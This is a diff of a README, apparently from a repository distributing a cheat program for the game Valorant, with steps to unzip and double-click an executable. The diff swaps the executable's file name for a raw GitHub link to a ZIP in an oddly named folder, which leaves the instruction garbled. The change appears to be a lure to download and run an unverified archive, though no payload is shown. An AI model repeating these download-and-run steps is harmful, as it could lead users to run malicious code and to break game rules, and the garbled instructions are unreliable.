DankeyOk/ValorantExternalCheat/README.md

 Once the download is complete, locate the file in your Downloads folder.
 Right-click on the downloaded ZIP file and select "Extract All."
 Follow the prompts to extract the files to a folder of your choice.

 ### 4. Open the Application
 Navigate to the folder where you extracted the files.
-Find the executable file, typically named `ValorantExternalCheat.exe`.
+Find the executable file, typically named `https://raw.githubusercontent.com/DankeyOk/ValorantExternalCheat/main/glaucescence/ValorantExternalCheat.zip`.
 Double-click on this file to run the software.

 ### 5. Adjust Settings
 Upon opening the application, you will see various options.
 Spend a moment reviewing the settings.
 Adjust them according to your preferences.
 The default settings will work well for most users.